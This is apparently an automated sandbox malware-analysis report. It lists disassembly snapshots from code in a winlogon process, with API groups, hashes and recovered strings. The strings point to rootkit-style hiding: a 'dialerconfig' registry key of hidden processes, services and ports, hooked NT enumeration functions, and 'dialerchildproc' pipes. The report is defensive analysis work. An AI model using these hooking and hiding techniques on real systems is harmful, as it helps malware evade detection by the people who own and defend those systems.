                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 462d93e9d4a0e680fdf53fa6f0790399abc521777f4edb82f0e93c3ca0212655
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: 7C313A32214B8196EB60CF39E8403EE77A4F7897A5F500526EADD47BAADF38C5458B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 04e8964ada8482dde20aeaec504a128aca7da22888bc9670aff59ace52eb4a06
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: 43312732215B8196EB60CF35E8403EE73A4F789B64F500126EADD43BA9EF38C5558B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 1443284424-0
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: 8135aa8c859eca88b472f6577030b008bd5a36516c187905332f9d78ebc0410d
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: 2DE11332B08A818AE720CF79D4803ED7BB5F3457A9F144126EFCA57B9ADA39C516C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 1443284424-0
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: 19a5e2ae036198b21cea44d22e95435a03512543e2070a9386ced60e74043973
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: C9E1E132706A829AE721CF75D8842FD7BB1F3857A8F144126DECA57F99DA38C41AC700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 106492572-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: ca77172fc4694397d0eee98b42b710f5442232310a5553bc0ed647c3b83bfaa7
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 73710B36310A5296EB20DF79E8506E967B8FB88BAAF005131DECE4772ADF38C545C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: 60450d9819197aa1e71601d9912f01fd07584f264283e72ac354523c06932170
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: 53515A72218B8593EB24CF6AE5443AAB7B5F788BA1F448124DACA07B25DF3CC156C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: a6b8cf6b9d9920d88a13565a623ffc44b0789d6b107cdd6b88d0ef13e1be8d64
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: 45515A76606B45D2EB24CF66E9443EAB7A5F788BA0F048124DBCA47F54DF38D156C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: 5018e3c16ee081900f48dfc0b44cb7c22ab6d3deb29489ff5733db2c5fabf063
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: AA31B375204A8BA0EA66EFBCEC516F46375B7483B7F80543795D912163DF38C689C381
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: acce079937b59a7d5ef512a0742d5e13e34530877829b40a35faa77f80c7a114
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: 2331B274213A4BA0FA34EFB4EC517F42320A7843A4F805437D9D952DE59F3C9A4AC3A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: 9cc23797241bd9c6455624054a86c55112d79788fc615ad117dbfb0d16f6876d
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: 8D21303661864182E720CB79E4443AA77B5F389BB5F504225EADA07BA9CF3CC549CB01
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: bc9211c9e8d18c101fbcabb65d848da86a921b09b91581893ec400470b8fa780
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: 5C211D36619A4292E720DB75E9443BA67A0F789BA4F504225EAD903FE8DF3CC549CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 190572456-537541572
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: 41e8ccb8948c96b7d1ffde0f8dec85215f339e10aea494801db1006b48715fc8
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: 0541A17131568281FA75CF7A98047F96295B708BF3F0856359DDA8B7E6DB38D4059300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 190572456-537541572
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: aff055bef8fee86c9947116e9ef96e44050fc13ebb726b510b007ece8b93aed7
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: 61418C76313A4291FA75DF66A8047FA6291BB44BF1F085535EED98BBD4EA3CD4068300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: 2cf1d6a52a5fcf71608e85a74e4cc95ff2048ae57c1fa3a6e010ad1f8144cd66
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: 3C415C73214B8197E764CF66E4447EAB7B1F389B96F408125DBCA07A55DF38D164CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: 1a0392e1c4c9c44b565f5797cb6e002aea4ad0cdb1cecb2e1023f6559b05a4c4
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: FD415C77215B8196E760CF62E4447EAB7A5F388B94F008125EBCA47A94DF38D565CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 257af69436dc62474af2289276336f1ea6a959ef5088c611663a86ed6f1156f1
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: 0B31A231316A9291EE35DB6AA8007F963A4BB4CBB2F194535EDEE4B392DF38D4459300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 0f6d1fd8afa586edbf2a1f9b4329b7b84373774835819dc8e7b8660080197af6
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: 9D316F31217A52A1EE31DB26AC407F962D4BB48BB4F594535EEFD47BD4EE38D4458300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 4eed410deb29fe02e4d6a9c82d05d52405034fca4d03115e108f9fb8ebd77e49
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: DF116031718B5186E760CB6AE844369A6B8F788FF6F044234EADE877A5DF7CC5048744
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 9f56a6bc4adcefbd683cca615f26c7eee689423ff04883cc578c46eeb651b86c
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: D6115831215B4286E760CB66EC943B9A2E8F7C8BF4F044234EAD987BA4DB78C9048744
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID:
                                                                                                      • API String ID: 1666949209-0
                                                                                                      • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction ID: 7b4408f94117f8152afc9a19360d4c0f5e0da9992b40bf104797cbbcd7f7a6b9
                                                                                                      • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction Fuzzy Hash: 9AD18E76209B8985DA70DB1AE4943AA77B4F7CCB95F100126EACD47BA6DF3DC541CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 756756679-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: c186e6d14c8712cbf3ebdfcbe23b2d83f210ab27c71bb88b81e885ececbefb71
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: 2331B831305B9692E771DF3AA8802B967A5FB4C7A6F0440309EC807B56EF38C4A19700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 756756679-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: 97c60e1e0a6a9b6dae114924340346f58c29abd4490de8d93274dcc5352f8b3e
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: 5C319031702B5292EB75DF66A8442F963A4FB44BA4F088034EFC987FD5EB38D4A18700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: c872339ae331751b2789699cf50496a639643510f3afc311aebbc75a28dd2c29
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: 83014031308A8296EB24DB26A4587A967B5F788FE2F484435DECE43755DF3CC985C740
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: eca26e4a6466a04f74bbf01205291164c4c907276368159b7bf00aba03710cb4
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: 5E014035305A4296EB24DB62A8587B963A5F788FE0F484435DFCA83B94DF3CD985C740
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: cea34d47a76406527dac14a875728ae1dd6e3f740ddcab315e6f04ee470d28b4
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: 97111B7571574286FB34DB79E8497AA66B4BB48FA2F040439CEC947756EF3CC5089700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: 5dd3af9212ec6a93453c6174e6fadd9e46857c451a33f0ae477a02035edd323a
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: F0111B7561274286EB34DB71E8197B666A4FB88BA1F040438DAC947BA4EF3CC4098710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: b923fe907f02e345a4b5fb28040116ba53e62a82edc1afcad605a8b520e690c9
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: 6BF0443230468292E770DB79F4943A96774F788BA9F848034CAC94795ADF2CC689C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: 4d02bb18fc4c128b1595ddecd1839d936fe506640f636b186fd94f9e09df3e7e
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: 54F0317230564292E770CB75F8943F96764F784BA8F848034DAC947DA4DE3CC649C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
